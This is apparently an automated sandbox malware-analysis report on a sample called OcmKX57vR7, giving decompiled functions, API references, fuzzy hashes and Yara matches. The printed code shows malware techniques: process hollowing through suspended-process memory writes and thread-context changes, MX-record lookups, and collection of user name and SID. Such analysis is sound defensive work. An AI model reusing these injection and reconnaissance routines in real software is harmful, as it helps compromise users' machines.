• Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
• Instruction ID: f446a591f13b15a5e12a750fe2e1e871632597af3bfc36e1bcb32baddf06707e
• Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
• Instruction Fuzzy Hash: D831B833A00207ABDF119BB49C48AAE7778EF04761F144266F51AE7390DB74DE41CB55
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
Similarity
• API ID: _write_multi_char$__get_printf_count_output_get_int_arg_wctomb_s_write_string
• String ID: -
• API String ID: 532768033-2547889144
• Opcode ID: c5a304928e7fc22829c34426129b93642ccf84d24fd7bf42c7d443934dd78d7e
• Instruction ID: d0441a1c6b983311c903b277fb7f4aa63ae84449d50a9e317f732e81e7264bbf
• Opcode Fuzzy Hash: c5a304928e7fc22829c34426129b93642ccf84d24fd7bf42c7d443934dd78d7e
• Instruction Fuzzy Hash: 85A17EB0E012288BDF24DF55DC89BEEB7B0AB44305F6481DAE4197B281D7789E80CF59
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
Similarity
• API ID: __hextodec__inc__un_inc_isdigit_isxdigit
• String ID: 8$F$o
• API String ID: 245833041-550588462
• Opcode ID: 46d235cddeeffa35f8f244a97450778168b5dffc4dab6483bc8664cefa99a91a
• Instruction ID: 2e5843cf0efdca669e14db03ce57f9015b289e99c6720257502155bfede8526d
• Opcode Fuzzy Hash: 46d235cddeeffa35f8f244a97450778168b5dffc4dab6483bc8664cefa99a91a
• Instruction Fuzzy Hash: D4718FB0D05659DBCF25CF64C8943EEBB70AF95308F2481DBD8296B242D2799AC1CF49
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%
E00402D21(intOrPtr _a4) {
	long _v8;                    /* tail of the list being built */
	long _v12;                   /* head of the list being built (return value) */
	void* _v16;                  /* ppQueryResults: DNS_RECORD list returned by DnsQuery_A */
	char _v28;                   /* stack buffer receiving the DLL name */
	struct HINSTANCE__* _t19;
	_Unknown_base(*)()* _t20;
	long* _t30;
	void* _t35;                  /* declaration added: scratch pointer left undeclared by the decompiler */
	intOrPtr* _t37;              /* current DNS_RECORD while walking the result list */
	long _t39;
	long _t40;                   /* newly allocated 0x108-byte node */
	void* _t41;                  /* stack-pointer shadow emitted by the decompiler */
	long* _t13;                  /* declaration added: pointer into the new node */

	/* 4 + 4 + 2 + 1 bytes: an 11-byte DLL name is copied inline into _v28;
	   the decompiler did not recover the string itself. */
	asm("movsd");
	asm("movsd");
	asm("movsw");
	asm("movsb");
	_t19 = GetModuleHandleA( &_v28);
	_t39 = 0;
	if(_t19 != 0) {
		L3:
		/* DnsQuery_A is resolved at run time rather than imported. */
		_t20 = GetProcAddress(_t19, "DnsQuery_A");
		if(_t20 == _t39) {
			L2:
			return 0;
		}
		/* Arguments pushed right to left for
		   DnsQuery_A(pszName, wType, Options, pExtra, ppQueryResults, pReserved) */
		_push(_t39);             /* pReserved = NULL */
		_t35 =  &_v16;
		_push( &_v16);           /* ppQueryResults */
		_push(_t39);             /* pExtra = NULL */
		_push(_t39);             /* Options = 0 */
		_push(0xf);              /* wType = 0xf = DNS_TYPE_MX */
		_push(_a4);              /* pszName = domain passed in by the caller */
		if( *_t20() != 0) {
			goto L2;
		}
		_t37 = _v16;
		_v8 = _t39;
		_v12 = _t39;
		if(_t37 == _t39) {
			L14:
			return _v12;
		}
		do {
			/* DNS_RECORD.wType lives at offset 8; skip anything that is not an MX record. */
			if( *((short*)(_t37 + 8)) != 0xf) {
				goto L12;
			}
			_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
			if(_t40 == 0) {
				break;
			}
			/* Zero-fill the node (helper inferred to be memset-like from its arguments). */
			E0040EE2A(_t35, _t40, 0, 0x108);
			_t41 = _t41 + 0xc;
			/* node+4 = MX preference (DNS_RECORD.Data.MX.wPreference, offset 0x1c) */
			 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
			_t13 = _t40 + 8; // 0x8
			/* node+8 = mail exchanger name (DNS_RECORD.Data.MX.pNameExchange, offset 0x18), at most 0xff bytes */
			lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
			/* Append to the singly linked list: node+0 is the next pointer. */
			_t30 = _v8;
			_v8 = _t40;
			if(_t30 != 0) {
				 *_t30 = _t40;
			} else {
				_v12 = _t40;
			}
			L12:
			_t37 =  *_t37;           /* DNS_RECORD.pNext at offset 0 */
			_t39 = 0;
		} while (_t37 != 0);
		/* Note: the DnsQuery_A result list in _v16 is never released in this function. */
		goto L14;
	}
	_t19 = LoadLibraryA( &_v28);
	if(_t19 != 0) {
		goto L3;
	}
	goto L2;
}

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                                                                  • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                                                                  • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                  • API String ID: 3560063639-3847274415
                                                                                                                                  • Opcode ID: 5e2bf11e9834445352213f4299fb31fa0ce6085a410f2f30f40d5b35f0e3f35c
                                                                                                                                  • Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
                                                                                                                                  • Opcode Fuzzy Hash: 5e2bf11e9834445352213f4299fb31fa0ce6085a410f2f30f40d5b35f0e3f35c
                                                                                                                                  • Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                  			E00406CC9(void* __ecx) {
                                                                                                                                  				_Unknown_base(*)()* _t8;
                                                                                                                                  				CHAR* _t17;
                                                                                                                                  				void* _t18;
                                                                                                                                  				void* _t23;
                                                                                                                                  				char _t25;
                                                                                                                                  				void* _t34;
                                                                                                                                  
                                                                                                                                  				_t23 = __ecx;
                                                                                                                                  				if( *0x412e08 != 0) {
                                                                                                                                  					L14:
                                                                                                                                  					return 0x412e08;
                                                                                                                                  				}
                                                                                                                                  				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
                                                                                                                                  				if(_t8 == 0) {
                                                                                                                                  					L4:
                                                                                                                                  					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
                                                                                                                                  						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
                                                                                                                                  							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
                                                                                                                                  							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
                                                                                                                                  							_t34 = _t34 + 0x28;
                                                                                                                                  						}
                                                                                                                                  						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
                                                                                                                                  						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
                                                                                                                                  					}
                                                                                                                                  					L10:
                                                                                                                                  					_t17 = 0x412e08;
                                                                                                                                  					goto L11;
                                                                                                                                  					L11:
                                                                                                                                  					_t25 =  *_t17;
                                                                                                                                  					_t17 =  &(_t17[1]);
                                                                                                                                  					if(_t25 != 0) {
                                                                                                                                  						goto L11;
                                                                                                                                  					} else {
                                                                                                                                  						_t18 = _t17 - 0x412e09;
                                                                                                                                  						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
                                                                                                                                  							 *((char*)(_t18 + 0x412e08)) = 0x5c;
                                                                                                                                  							 *((char*)(_t18 + 0x412e09)) = _t25;
                                                                                                                                  						}
                                                                                                                                  						goto L14;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_push(0x104);
                                                                                                                                  				_push(0x412e08);
                                                                                                                                  				if( *_t8() == 0 ||  *0x412e08 == 0) {
                                                                                                                                  					goto L4;
                                                                                                                                  				} else {
                                                                                                                                  					goto L10;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                                                                  • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$PromptOnSecureDesktop$kernel32
                                                                                                                                  • API String ID: 1082366364-2834986871
                                                                                                                                  • Opcode ID: bc03c77ada90e60c0bc9b65eb9809c5406ccea75b26a037b4d1e2b725433b91c
                                                                                                                                  • Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
                                                                                                                                  • Opcode Fuzzy Hash: bc03c77ada90e60c0bc9b65eb9809c5406ccea75b26a037b4d1e2b725433b91c
                                                                                                                                  • Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                  			E0040977C(void* __ecx, CHAR* _a4) {
                                                                                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                                                                                  				void _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				struct _STARTUPINFOA _v96;
                                                                                                                                  				struct _CONTEXT _v812;
                                                                                                                                  				void* _t33;
                                                                                                                                  
                                                                                                                                  				_t46 = __ecx;
                                                                                                                                  				E0040EE2A(__ecx,  &_v96, 0, 0x44);
                                                                                                                                  				_v96.cb = 0x44;
                                                                                                                                  				if(CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20) != 0) {
                                                                                                                                  					E0040EE2A(_t46,  &_v812, 0, 0x2cc);
                                                                                                                                  					_v812.ContextFlags = 0x10002;
                                                                                                                                  					if(GetThreadContext(_v20.hThread,  &_v812) != 0) {
                                                                                                                                  						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24);
                                                                                                                                  						_push(0);
                                                                                                                                  						if(_t33 == 0) {
                                                                                                                                  							L4:
                                                                                                                                  							TerminateProcess(_v20.hProcess, ??);
                                                                                                                                  							goto L1;
                                                                                                                                  						}
                                                                                                                                  						if(WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??) == 0) {
                                                                                                                                  							goto L3;
                                                                                                                                  						}
                                                                                                                                  						_v812.Eax = _v28;
                                                                                                                                  						if(SetThreadContext(_v20.hThread,  &_v812) == 0) {
                                                                                                                                  							goto L3;
                                                                                                                                  						}
                                                                                                                                  						ResumeThread(_v20.hThread);
                                                                                                                                  						return 1;
                                                                                                                                  					}
                                                                                                                                  					L3:
                                                                                                                                  					_push(0);
                                                                                                                                  					goto L4;
                                                                                                                                  				}
                                                                                                                                  				L1:
                                                                                                                                  				return 0;
                                                                                                                                  			}
                                                                                                                                  Instruction addresses (decompiler side column, one per statement, alignment lost in extraction): 0x0040977c 0x0040978f 0x004097a9 0x004097b9 0x004097cf 0x004097e1 0x004097f3 0x00409811 0x00409819 0x0040981c 0x004097f6 0x004097f9 0x00000000 0x004097f9 0x00409839 0x00000000 0x00000000 0x0040983e 0x00409856 0x00000000 0x00000000 0x0040985b 0x00000000 0x00409863 0x004097f5 0x004097f5 0x00000000 0x004097f5 0x004097bb 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,PromptOnSecureDesktop), ref: 004097B1
                                                                                                                                  • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097EB
                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 004097F9
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 00409831
                                                                                                                                  • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040984E
                                                                                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,PromptOnSecureDesktop), ref: 0040985B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                                                                  • String ID: D$PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2981417381-1403908072
                                                                                                                                  • Opcode ID: 32bae011682959fb3fb7d6c44d279b6a6e60969011b3782382acaed110600071
                                                                                                                                  • Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
                                                                                                                                  • Opcode Fuzzy Hash: 32bae011682959fb3fb7d6c44d279b6a6e60969011b3782382acaed110600071
                                                                                                                                  • Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$_get_int_arg_wctomb_s_write_string
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 557302112-2547889144
                                                                                                                                  • Opcode ID: f99934b454a3d1bf400a84925ce5597834dedd02fc1dc8bff83ec1b1b6f9b803
                                                                                                                                  • Instruction ID: 77bf603594803d1c9b5e79f1d2728a729673d1f5d1a9e691231cf89a20a4aa33
                                                                                                                                  • Opcode Fuzzy Hash: f99934b454a3d1bf400a84925ce5597834dedd02fc1dc8bff83ec1b1b6f9b803
                                                                                                                                  • Instruction Fuzzy Hash: 14A17CB4E012288FDB24CF54DC89BEEB7B0AB48305F5481DAE4196B291D6789E80CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 00AD67C3
                                                                                                                                  • htonl.WS2_32(?), ref: 00AD67DF
                                                                                                                                  • htonl.WS2_32(?), ref: 00AD67EE
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 00AD68F1
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00AD69BC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Processhtonl$CurrentExitHugeRead
                                                                                                                                  • String ID: except_info$localcfg
                                                                                                                                  • API String ID: 1150517154-3605449297
                                                                                                                                  • Opcode ID: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
                                                                                                                                  • Instruction ID: 454a07fe417a680b141ffcf35172ba5a051b4b9b8253094d10fad74669932252
                                                                                                                                  • Opcode Fuzzy Hash: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
                                                                                                                                  • Instruction Fuzzy Hash: E6615E71A40208AFDB609FB4DC45FEA77F9FB08300F248066FA6DD2261EA7599948F54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • htons.WS2_32(00ADCC84), ref: 00ADF5B4
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 00ADF5CE
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00ADF5DC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesockethtonssocket
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 311057483-2401304539
                                                                                                                                  • Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                                                                  • Instruction ID: d930fd4c4deebc3e6ba21bbb9ba0e7c9142d49d4298de14f9563085b7e37c4c9
                                                                                                                                  • Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
                                                                                                                                  • Instruction Fuzzy Hash: 26315A76900118AFDB10DFA5DC89DEF7BBCEF89310F104566F91AE3250E7709A818BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E00406F5F(long _a4, long _a8) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				union _SID_NAME_USE _v16;
                                                                                                                                  				void _v84;
                                                                                                                                  				char _v212;
                                                                                                                                  				CHAR* _t36;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                  				char _t62;
                                                                                                                                  				void* _t65;
                                                                                                                                  				char* _t66;
                                                                                                                                  				intOrPtr _t67;
                                                                                                                                  				CHAR* _t68;
                                                                                                                                  				void* _t69;
                                                                                                                                  
                                                                                                                                  				_t68 = _a4;
                                                                                                                                  				 *_t68 = 0;
                                                                                                                                  				if(GetUserNameA(_t68,  &_a8) == 0) {
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_t36 = _t68;
                                                                                                                                  				_t66 =  &(_t36[1]);
                                                                                                                                  				do {
                                                                                                                                  					_t62 =  *_t36;
                                                                                                                                  					_t36 =  &(_t36[1]);
                                                                                                                                  				} while (_t62 != 0);
                                                                                                                                  				_a8 = _t36 - _t66;
                                                                                                                                  				_a4 = 0x7c;
                                                                                                                                  				_v12 = 0x80;
                                                                                                                                  				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
                                                                                                                                  					L8:
                                                                                                                                  					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
                                                                                                                                  					return _a8;
                                                                                                                                  				}
                                                                                                                                  				E0040EF00( &(_t68[_a8]), "/");
                                                                                                                                  				_a8 = _a8 + 1;
                                                                                                                                  				_push( &_v8);
                                                                                                                                  				_t53 =  &_v84;
                                                                                                                                  				_push(_t53);
                                                                                                                                  				L0040F4AA();
                                                                                                                                  				if(_t53 == 0) {
                                                                                                                                  					goto L8;
                                                                                                                                  				}
                                                                                                                                  				_t54 = _v8;
                                                                                                                                  				_t20 = _t54 + 1; // 0x121
                                                                                                                                  				_t65 = _t20;
                                                                                                                                  				do {
                                                                                                                                  					_t67 =  *_t54;
                                                                                                                                  					_t54 = _t54 + 1;
                                                                                                                                  				} while (_t67 != 0);
                                                                                                                                  				_a4 = _t54 - _t65;
                                                                                                                                  				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
                                                                                                                                  				_a8 = _a8 + _a4;
                                                                                                                                  				_t69 = _t69 + 0xc;
                                                                                                                                  				LocalFree(_v8);
                                                                                                                                  				goto L8;
                                                                                                                                  			}

                                                                                                                                  Instruction addresses (column detached from the listing above during extraction): 0x00406f6c 0x00406f77 0x00406f82 0x00000000 0x00407047 0x00406f88 0x00406f8a 0x00406f8d 0x00406f8d 0x00406f8f 0x00406f90 0x00406f96 0x00406fb3 0x00406fba 0x00406fc9 0x00407025 0x0040703f 0x00000000 0x00407042 0x00406fd6 0x00406fdb 0x00406fe3 0x00406fe4 0x00406fe7 0x00406fe8 0x00406fef 0x00000000 0x00000000 0x00406ff1 0x00406ff4 0x00406ff4 0x00406ff7 0x00406ff7 0x00406ff9 0x00406ffa 0x00407000 0x0040700e 0x00407016 0x00407019 0x0040701f 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
                                                                                                                                  • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
                                                                                                                                  • LocalFree.KERNEL32(00000120), ref: 0040701F
                                                                                                                                  • wsprintfA.USER32 ref: 00407036
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                                                                  • String ID: /%d$|
                                                                                                                                  • API String ID: 676856371-4124749705
                                                                                                                                  • Opcode ID: 473b18cc682185cad3921d3bacaa7dea67b37dc77049966f098f71850abf7020
                                                                                                                                  • Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
                                                                                                                                  • Opcode Fuzzy Hash: 473b18cc682185cad3921d3bacaa7dea67b37dc77049966f098f71850abf7020
                                                                                                                                  • Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(?), ref: 00AD2FA1
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00AD2FB1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,004103F0), ref: 00AD2FC8
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00AD3000
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00AD3007
                                                                                                                                  • lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 00AD3032
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                                                                  • String ID: dnsapi.dll
                                                                                                                                  • API String ID: 1242400761-3175542204
                                                                                                                                  • Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                                                                  • Instruction ID: 5814f2fadae54a750da6e115b6fc758d970e1c2295f68d553674450bceb83826
                                                                                                                                  • Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                                                                  • Instruction Fuzzy Hash: 1D217172901629BBCB219B55DC48AEFBBBCEF18B50F104422F906E7240D7B49E81C7E4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 43%
                                                                                                                                  			E00406BA7(CHAR* _a4) {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				long _t14;
                                                                                                                                  				int _t19;
                                                                                                                                  				void* _t28;
                                                                                                                                  				void* _t39;
                                                                                                                                  
                                                                                                                                  				_push(_t30);
                                                                                                                                  				if(IsBadCodePtr( *0x4130ac) == 0) {
                                                                                                                                  					_push( &_v8);
                                                                                                                                  					_push(0);
                                                                                                                                  					if( *0x4130ac() == 0) {
                                                                                                                                  						_t28 = E0040EBCC(_v8);
                                                                                                                                  						if(_t28 == 0) {
                                                                                                                                  							L7:
                                                                                                                                  							_t14 = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_push( &_v8);
                                                                                                                                  							_push(_t28);
                                                                                                                                  							if( *0x4130ac() == 0) {
                                                                                                                                  								_v12 = 0;
                                                                                                                                  								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                  								if(_t39 != 0xffffffff) {
                                                                                                                                  									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
                                                                                                                                  									_push(_t39);
                                                                                                                                  									if(_t19 != 0) {
                                                                                                                                  										CloseHandle();
                                                                                                                                  										E0040EC2E(_t28);
                                                                                                                                  										_t14 = _v8;
                                                                                                                                  									} else {
                                                                                                                                  										CloseHandle();
                                                                                                                                  										DeleteFileA(_a4);
                                                                                                                                  										goto L9;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									L9:
                                                                                                                                  									E0040EC2E(_t28);
                                                                                                                                  									_t14 = 0;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								E0040EC2E(_t28);
                                                                                                                                  								goto L7;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t14 = 0;
                                                                                                                                  					}
                                                                                                                                  					return _t14;
                                                                                                                                  				} else {
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  Instruction addresses (column detached from the listing above during extraction): 0x00406bab 0x00406bba 0x00406bc4 0x00406bc7 0x00406bd2 0x00406be4 0x00406be9 0x00406c03 0x00406c03 0x00406beb 0x00406bee 0x00406bef 0x00406bfa 0x00406c1a 0x00406c23 0x00406c28 0x00406c3e 0x00406c44 0x00406c47 0x00406c5a 0x00406c61 0x00406c66 0x00406c49 0x00406c49 0x00406c52 0x00000000 0x00406c52 0x00406c2a 0x00406c2a 0x00406c2b 0x00406c30 0x00406c30 0x00406bfc 0x00406bfd 0x00000000 0x00406c02 0x00406bfa 0x00406bd4 0x00406bd4 0x00406bd4 0x00406c6e 0x00406bbc 0x00406bbf 0x00406bbf

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
